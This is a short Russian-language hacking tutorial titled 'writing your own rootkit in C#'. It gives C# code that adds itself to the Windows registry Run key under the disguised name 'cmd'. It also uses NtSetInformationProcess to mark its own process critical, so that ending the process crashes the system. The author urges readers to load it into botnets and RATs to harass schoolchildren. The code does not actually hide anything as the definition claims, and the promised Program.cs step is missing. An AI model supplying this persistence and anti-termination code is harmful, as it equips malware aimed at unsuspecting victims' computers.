Пишем свой руткит на С#

Привет %username%! Сегодня будем писать свой мини руткит на мові С#!

Для начала нам надо узнать что такое руткит.

❗️ Rootkit — программа, которая скрывает от антивирусов собственные вредоносные действия, либо маскирует работу другого вредоносного ПО — например, трояна. Руткитом скрываются, в частности, системные процессы, файлы, драйверы, записи в реестре и сетевые соединения, не позволяя антивирусам идентифицировать следы присутствия этой зловредной программы.

Шо то поняли? Я нет...

Ладно, давайте для начала кинем юзинги:

using System; 
using System.Diagnostics;   
using System.Runtime.InteropServices;
using Microsoft.Win32;
using System.Windows.Forms;

Теперь можно сделать функию автозагрузки:

public static void AutoRun()
        {
            RegistryKey rsk = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            rsk.SetValue("cmd", Application.ExecutablePath);
        }

Теперь создадим класс где напишем сам руткит:

[DllImport("ntdll.dll", SetLastError = true)]
        private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);public static bool GetRookKit()
        {
            try
            {
                Process.EnterDebugMode();
                int iIsCritical = -1;NtSetInformationProcess(Process.GetCurrentProcess().Handle, 0x1D, ref iIsCritical, sizeof(int));return true;
            }
            catch { return false; }
        }

Теперь переходим в Program.cs, и пишем:

⚠️ Вот и готов наш руткит, теперь можете кидать его в свои ботнеты - раты, и тролить школьников. С вами был кибер пиздец, надеюсь я вам как-то помог. Спасибо за внимание!